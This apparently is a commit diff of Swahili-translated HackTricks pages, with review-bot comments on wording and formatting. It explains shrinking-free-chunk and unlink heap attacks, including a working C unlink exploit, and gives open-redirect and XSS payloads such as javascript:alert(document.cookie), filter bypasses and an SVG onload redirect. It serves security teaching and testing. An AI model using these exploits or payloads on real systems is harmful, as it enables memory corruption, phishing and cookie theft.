* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Kwa kupata ufikiaji wa kujaza 1B, muhusika anaweza kubadilisha habari ya awali ya metadata ya ukubwa, kuruhusu kuharibu vipande ambavyo kimsingi vinaachiliwa, hatimaye kuzalisha kipande ambacho kina kipande kingine halali.
### Mfano wa Kanuni:
* [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c)
* Udukuzi huu haufanyi kazi tena kutokana na matumizi ya Tcaches.
* Zaidi ya hayo, ukijaribu kuitumia kwa vipande vikubwa zaidi (hivyo tcaches hazihusiki), utapata kosa: `malloc(): ukubwa usiofaa ufuatao (usioorodheshwa)`
### Lengo
* Fanya kipande kiwe kimejumuishwa ndani ya kipande kingine ili upatikanaji wa kuandika juu ya kipande cha pili kuruhusu kubadilisha kile kilichomo.
### Mahitaji
* Kujaza kosa moja ili kubadilisha habari ya awali ya metadata ya ukubwa
### Udukuzi
* Vipande 3 vya kumbukumbu (a, b, c) vinahifadhiwa moja baada ya nyingine. Kisha cha kati kinachiliwa. Cha kwanza kina kosa la kujazwa kwa kosa moja na muhusika anaitumia na 0x00 (ikiwa byte iliyotangulia ilikuwa 0x10 itafanya kipande cha kati kiashiria kuwa ni kidogo kwa 0x10 kuliko ilivyo kweli).
* Kisha, vipande vidogo 2 zaidi vinatengwa katika kipande kilicholiwa cha kati (b), hata hivyo, kwani `b + b->ukubwa` haujawahi kusasishwa kipande c kwa sababu anwani inayoelekezwa ni ndogo kuliko inavyopaswa.&#x20;
* Kisha, b1 na c vinachiliwa. Kwani `c - c->ukubwa_uliotangulia` bado inaelekeza kwa b (sasa b1), vyote viwili vinajumuishwa katika kipande kimoja. Hata hivyo, b2 bado iko ndani kati ya b1 na c.
* Hatimaye, malloc mpya inafanywa kurudisha eneo hili la kumbukumbu ambalo kimsingi litakuwa na b2, kuruhusu mmiliki wa malloc mpya kudhibiti maudhui ya b2.
Picha hii inaelezea kikamilifu udukuzi:
<figure><img src="../../.gitbook/assets/image (1247).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks">https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks</a></p></figcaption></figure>
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks](https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
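Review bot: the glibc error in the Code bullet has been translated, `malloc(): ukubwa usiofaa ufuatao (usioorodheshwa)`; it must stay as the literal string `malloc(): invalid next size (unsorted)` that the heap-functions page in this commit quotes, because readers grep for the exact message. The same applies to the struct members inside the code spans in the Attack bullets: `b->ukubwa` and `c->ukubwa_uliotangulia` are `b->size` and `c->prev_size` (the House of Einherjar page keeps `prev_size` untranslated). The second Attack bullet ends with a stray `&#x20;` entity, "muhusika" is again used for "attacker" instead of "mshambuliaji", and the title "Kujazwa kwa kosa moja" does not match the SUMMARY entry "Off by one overflow".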


@ -0,0 +1,139 @@
# Shambulio la Unlink
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Wakati shambulio hili lilipogunduliwa kwa kiasi kikubwa iliruhusu WWW (Andika Nini Wapi), hata hivyo, **uchunguzi fulani uliongezwa** ukifanya toleo jipya la shambulio kuwa la kuvutia zaidi na **ngumu zaidi na **hakinafaidishi**.
### Mfano wa Kanuni:
<details>
<summary>Kanuni</summary>
```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work
struct chunk_structure {
size_t prev_size;
size_t size;
struct chunk_structure *fd;
struct chunk_structure *bk;
char buf[10]; // padding
};
int main() {
unsigned long long *chunk1, *chunk2;
struct chunk_structure *fake_chunk, *chunk2_hdr;
char data[20];
// First grab two chunks (non fast)
chunk1 = malloc(0x8000);
chunk2 = malloc(0x8000);
printf("Stack pointer to chunk1: %p\n", &chunk1);
printf("Chunk1: %p\n", chunk1);
printf("Chunk2: %p\n", chunk2);
// Assuming attacker has control over chunk1's contents
// Overflow the heap, override chunk2's header
// First forge a fake chunk starting at chunk1
// Need to setup fd and bk pointers to pass the unlink security check
fake_chunk = (struct chunk_structure *)chunk1;
fake_chunk->size = 0x8000;
fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
// Next modify the header of chunk2 to pass all security checks
chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
chunk2_hdr->prev_size = 0x8000; // chunk1's data region size
chunk2_hdr->size &= ~1; // Unsetting prev_in_use bit
// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
// This results in chunk1 pointer pointing to chunk1 - 3
// i.e. chunk1[3] now contains chunk1 itself.
// We then make chunk1 point to some victim's data
free(chunk2);
printf("Chunk1: %p\n", chunk1);
printf("Chunk1[3]: %x\n", chunk1[3]);
chunk1[3] = (unsigned long long)data;
strcpy(data, "Victim's data");
// Overwrite victim's data using chunk1
chunk1[0] = 0x002164656b636168LL;
printf("%s\n", data);
return 0;
}
```
</details>
* Shambulizi halifanyi kazi ikiwa tcaches zinatumika
### Lengo
* Badilisha kipande cha kidole kwa kipande kwenye stakishi ili ielekeze kwenye stakishi ili iwezekane kubadilisha maudhui ya stakishi kwa kuandika kwenye kipande
### Mahitaji
* Udhibiti fulani katika kumbukumbu (k.m. stakishi) ili uweze kuunda vikundi vichache kwa kutoa thamani kwa baadhi ya sifa.
* Kuvuja kwa stakishi ili kuweza kuweka viashiria vya kipande bandia.
### Shambulizi
* Kuna vikundi vichache (kikundi1 na kikundi2)
* Mshambuliaji anadhibiti maudhui ya kikundi1 na vichwa vya kikundi2.
* Katika kikundi1 mshambuliaji anaunda muundo wa kipande bandia:
* Ili kuepuka ulinzi anahakikisha kuwa uga `ukubwa` ni sahihi ili kuepuka kosa: `ukubwa ulioharibika dhidi ya ukubwa uliopita wakati wa kufanya kazi`
* na viashiria `fd` na `bk` vya kipande bandia vinawaelekeza kwenye eneo ambapo kipande1 pointer kimehifadhiwa kwa vipimo vya -3 na -2 mtawalia hivyo `kikundi_bandia->fd->bk` na `kikundi_bandia->bk->fd` vinawaelekeza kwenye nafasi kwenye kumbukumbu (stakishi) ambapo anwani halisi ya kikundi1 iko:
<figure><img src="../../.gitbook/assets/image (1245).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
* Vichwa vya kikundi2 vinabadilishwa kuonyesha kuwa kipande kilichopita hakijatumika na kwamba ukubwa ni ukubwa wa kipande bandia kilichomo.
* Wakati kipande cha pili kinapofutwa basi kipande bandia hiki kinatenganishwa kutokea:
* `kikundi_bandia->fd->bk` = `kikundi_bandia->bk`
* `kikundi_bandia->bk->fd` = `kikundi_bandia->fd`
* Awali ilifanywa kuwa `kikundi_bandia->fd->bk` na `kikundi_bandia->fd->bk` vinawaelekeza kwenye eneo moja (eneo kwenye stakishi ambapo `kikundi1` ilihifadhiwa, hivyo ilikuwa orodha halali). Kwa kuwa **zote zinaelekeza kwenye eneo moja** ni ile ya mwisho (`kikundi_bandia->bk->fd = kikundi_bandia->fd`) itakayochukua **athari**.
* Hii ita**badilisha anwani ya kipande1 kwenye stakishi kwenda kwenye anwani (au herufi) iliyohifadhiwa vipimo 3 kabla kwenye stakishi**.
* Hivyo, ikiwa mshambuliaji anaweza kudhibiti tena maudhui ya kikundi1, ataweza **kuandika ndani ya stakishi** akiweza kubadilisha anwani ya kurudi akiruka kifaa cha ulinzi na kubadilisha thamani na viashiria vya mchanganyiko wa ndani. Hata kubadilisha tena anwani ya kikundi1 iliyohifadhiwa kwenye stakishi kwenda eneo tofauti ambapo ikiwa mshambuliaji anaweza kudhibiti tena maudhui ya kikundi1 ataweza kuandika popote.
<figure><img src="../../.gitbook/assets/image (1246).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
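Review bot: the prose of this new file renames the identifiers that its own code block uses, so a reader cannot map the bullets to the source: the "Shambulizi" list talks about `kikundi_bandia->fd->bk`, `kikundi1` and `kipande1`, while the C program defines `fake_chunk`, `chunk1` and `chunk2`; keep code identifiers untranslated (`fake_chunk->fd->bk`, `chunk1`), and use one Swahili word for "chunk" throughout rather than alternating between `kikundi` and `kipande`. In the same list the glibc abort message has been translated (`ukubwa ulioharibika dhidi ya ukubwa uliopita wakati wa kufanya kazi`); that string is what the user will actually see on the terminal, so restore the original English `corrupted size vs. prev_size` text of that check instead of translating it. The bullet that explains the two unlink writes ("Awali ilifanywa kuwa `kikundi_bandia->fd->bk` na `kikundi_bandia->fd->bk`...") names the same pointer twice; the second one should be the `->bk->fd` side, otherwise the sentence no longer explains why the last write wins. The opening paragraph has unbalanced bold markers (`**ngumu zaidi na **hakinafaidishi**`), which will render stray asterisks. Finally, in the code carried over from upstream, `printf("Chunk1[3]: %x\n", chunk1[3]);` passes an `unsigned long long` to `%x`, which truncates the value to 32 bits and draws a compiler warning; `%llx`, or `%p` with a cast, prints the full pointer.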

View file

@ -1,25 +1,28 @@
# Uelekezaji wa Wazi
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Uelekezaji wa Wazi
# Uelekeze kwa localhost au anwani zisizo na kikomo
### Uelekezaji kwa localhost au uwanja wa kiholela
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
## Uelekeze wazi kwa XSS
### Uelekezaji wa Wazi kwa XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
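Review bot: the replacement summary line loses the fully Swahili wording of the line it replaces: `Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa` becomes `Jifunze AWS hacking kutoka sifuri hadi shujaa`, a mixed-language phrase; keep the earlier form, which is also what the unlink-attack page added in this same commit uses. The reworked contribution list still links the text `@carlospolopm` to `https://twitter.com/hacktricks\_live`; the other file's footer uses `@hacktricks\_live` for that URL, so the handle text should be updated here as well. The two heading demotions (`### Uelekezaji kwa localhost au uwanja wa kiholela`, `### Uelekezaji wa Wazi kwa XSS`) are correct given the file opens with an H1, but the unchanged `## Uelekezaji wa Wazi` directly under the H1 of the same title is now a duplicate heading and could be dropped.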
@ -27,6 +30,9 @@ javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
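Review bot: the hunk only inserts two lines, but the unchanged comments next to them carry typos the translation pass should fix while it is here: `line coment` (should be `comment`) and `FILTER_VALIDATE_URL os PHP` (should be `of PHP`). The new comment is also written `# Abuse ...` with a space after the hash, while every other comment in this block is `#Bypass`, `#Javascript`, `#This`; pick one style for the block.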
@ -62,33 +68,7 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
# Kufungua Uelekezaji kwa kupakia faili za svg
## Maelezo
Uelekezaji wazi ni kasoro ya usalama inayoruhusu mtumiaji kudanganywa kubofya kiungo ambacho kinawaelekeza kwenye tovuti nyingine. Katika kesi hii, tunazingatia kasoro ya uelekezaji wazi inayotokea wakati faili ya SVG inapakiwa kwenye tovuti.
## Utekelezaji
1. Kwanza, tunahitaji kupata tovuti ambayo inaruhusu kupakia faili za SVG.
2. Tumia kivinjari cha wavuti au zana ya upimaji wa usalama kama Burp Suite kufanya uchunguzi wa tovuti hiyo.
3. Tafuta sehemu ya tovuti ambapo faili za SVG zinapakiwa.
4. Pakia faili ya SVG iliyoundwa na kiungo cha uelekezaji wazi. Kiungo hiki kinapaswa kuwa kama ifuatavyo:
```html
<svg onload="location.href='http://www.malicious-website.com'"></svg>
```
5. Baada ya kupakia faili ya SVG, angalia ikiwa kiungo cha uelekezaji wazi kimefanya kazi kwa kuchunguza ikiwa kuna ombi la GET kwa tovuti mbaya iliyotajwa katika kiungo.
## Kuzuia
Ili kuzuia kasoro ya uelekezaji wazi, unaweza kuchukua hatua zifuatazo:
- Thibitisha na ukague kwa uangalifu data inayopokelewa kutoka kwa mtumiaji kabla ya kuitumia kama kiungo cha uelekezaji.
- Tumia njia za uthibitishaji wa kiungo ili kuhakikisha kuwa kiungo kinawaelekeza tu kwenye tovuti zilizoidhinishwa.
- Tumia vikwazo vya faili na aina ya faili ili kuzuia kupakia faili hatari kama SVG.
- Endelea kusasisha na kurekebisha programu na mifumo yako ili kuzuia kasoro za usalama zinazoweza kusababisha uelekezaji wazi.
## Kuelekeza wazi kupakia faili za svg
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -98,17 +78,7 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
# Vigezo vya kuingiza kawaida
When testing for open redirect vulnerabilities, it is important to understand common injection parameters that can be exploited. These parameters are often found in the URL or in the request body. Here are some common injection parameters to look out for:
- **url**: This parameter is used to specify the target URL. Attackers can manipulate this parameter to redirect users to malicious websites.
- **redirect**: This parameter is used to specify the redirect URL. Attackers can modify this parameter to redirect users to a different location.
- **next**: This parameter is commonly used in login and authentication flows to redirect users after successful authentication. Attackers can abuse this parameter to redirect users to malicious sites.
- **return**: Similar to the **next** parameter, this parameter is used to redirect users after a successful action. Attackers can exploit this parameter to redirect users to malicious destinations.
- **callback**: This parameter is often used in JSONP (JSON with Padding) requests to specify a callback function. Attackers can manipulate this parameter to redirect users to malicious sites.
By understanding these common injection parameters, you can effectively test for open redirect vulnerabilities and protect your web applications from potential attacks.
## Vigezo vya kawaida vya kuingiza
```
/{payload}
?next={payload}
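Review bot: the new heading `## Kuelekeza wazi kupakia faili za svg` is phrased differently from the sibling headings rewritten earlier in this file (`### Uelekezaji wa Wazi kwa XSS`, `### Uelekezaji kwa localhost au uwanja wa kiholela`): it uses the verb form and drops `kwa`; `## Uelekezaji wa Wazi kwa kupakia faili za svg` keeps the set consistent. Check the level too: the XSS and localhost sections became `###` under `## Uelekezaji wa Wazi`, so if the svg-upload and `## Vigezo vya kawaida vya kuingiza` sections are meant to be their peers they should be `###` as well. Deleting the generated `Maelezo` / `Utekelezaji` / `Kuzuia` walkthrough and the English "When testing for open redirect vulnerabilities..." paragraph is right; both read as machine-generated filler that duplicates the payload blocks immediately after them.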
@ -183,69 +153,19 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
# Mifano ya nambari
## Mifano ya nambari
### .Net
#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
### Java
Java ni lugha ya programu inayotumika sana kwa maendeleo ya programu za kompyuta. Inajulikana kwa usalama wake na uwezo wake wa kufanya kazi kwenye majukwaa tofauti. Hapa kuna baadhi ya mbinu za kawaida za udukuzi zinazohusiana na Java:
#### Open Redirect
Open Redirect ni mbinu ya udukuzi ambapo mtumiaji anaelekezwa kutoka kwenye tovuti moja hadi nyingine kupitia kiungo kilicho na udanganyifu. Hii inaweza kufanyika kwa kutumia parameter ya URL ambayo inaruhusu mtumiaji kubadilisha URL ya mwisho.
Mara nyingi, mbinu hii inaweza kutumiwa kwa njia mbalimbali za kijamii za udukuzi, kama vile kudanganya mtumiaji kubofya kiungo ambacho kinamwongoza kwenye tovuti ya udanganyifu au kudanganya mtumiaji kuingia maelezo yao ya siri kwenye tovuti ya udanganyifu.
Kwa mfano, ikiwa tovuti ina parameter ya URL inayoitwa "redirect", mtumiaji anaweza kubadilisha URL ya mwisho kwa kuongeza kiungo cha udanganyifu. Hii inaweza kusababisha mtumiaji kuwa na imani kwamba wanahamishwa kwenye tovuti halali, wakati wanapelekwa kwenye tovuti ya udanganyifu.
Kuzuia mbinu hii ya udukuzi, ni muhimu kufanya ukaguzi wa kina wa parameter za URL na kuhakikisha kuwa kiungo cha mwisho kinabaki ndani ya tovuti halali.
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
### PHP
#### PHP
#### Open Redirect
Open Redirect is a vulnerability that allows an attacker to redirect users from a trusted website to a malicious website. This can be exploited by manipulating the URL parameters or user input.
##### Exploiting Open Redirect Vulnerabilities
To exploit an open redirect vulnerability, follow these steps:
1. Identify the vulnerable parameter or user input that is used to construct the redirect URL.
2. Craft a malicious URL by modifying the value of the vulnerable parameter to point to the attacker's website.
3. Send the malicious URL to the target user, enticing them to click on it.
4. When the user clicks on the malicious URL, they will be redirected to the attacker's website.
##### Example
Suppose there is a website that has an open redirect vulnerability in the `redirect` parameter. The vulnerable URL looks like this:
```
https://example.com/redirect?url=<redirect_url>
```
To exploit this vulnerability, an attacker can craft a malicious URL like this:
```
https://example.com/redirect?url=https://malicious-website.com
```
When the target user clicks on this URL, they will be redirected to `https://malicious-website.com`.
##### Mitigation
To mitigate open redirect vulnerabilities, follow these best practices:
1. Validate and sanitize user input to prevent malicious URLs from being constructed.
2. Implement a whitelist approach for redirect URLs, allowing only trusted domains.
3. Use server-side checks to verify the validity of redirect URLs.
4. Educate users about the risks of clicking on unknown or suspicious URLs.
By following these practices, you can reduce the risk of open redirect vulnerabilities in your PHP applications.
PHP ni lugha ya programu ya upande wa seva inayotumiwa sana kwa maendeleo ya wavuti.
```php
<?php
/* browser redirections*/
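Review bot: `## Mifano ya nambari` translates to "number examples", not "code examples"; `## Mifano ya msimbo` is the usual rendering, and the same correction applies to the old `# Mifano ya nambari` line being replaced. Removing the filler Java and PHP prose is correct, but the fence tags left behind around the snippets are wrong: the `.Net` and `Java` examples (`response.redirect(...)`) are fenced as `bash`; tag them with the snippet's language or leave the tag off so the highlighting is not misleading. The Java line `response.redirect("http://mysafedomain.com");` is also not the servlet API; the call is `response.sendRedirect(...)`, which is worth correcting while this section is being touched.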
@ -253,28 +173,27 @@ header("Location: http://mysafedomain.com");
exit;
?>
```
# Vifaa
## Vifaa
* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
# Vyanzo
## Vyanzo
* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
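Review bot: the two reference lines now end in `\\` instead of `\`; in the Markdown this repo uses, a single trailing backslash is a hard line break whereas `\\` renders as a literal backslash at the end of the line, so the hunk introduces a visible rendering regression on `...orodha za kufanya majaribio ya kuingiza data.\\` and on the pentester.land link. Restore the single `\` or drop it entirely, since the two bullets that follow have no trailing backslash at all. The footer repeats the problems from the top of the file: `Jifunze AWS hacking kutoka sifuri hadi shujaa` mixes languages where the old line was fully Swahili, and `@carlospolopm` is still linked to `https://twitter.com/hacktricks\_live`. Minor: the heading `## Vyanzo` for the reference list differs from `## Marejeo`, which the unlink-attack page in this same commit uses for the same section; one term across the repo is easier to search.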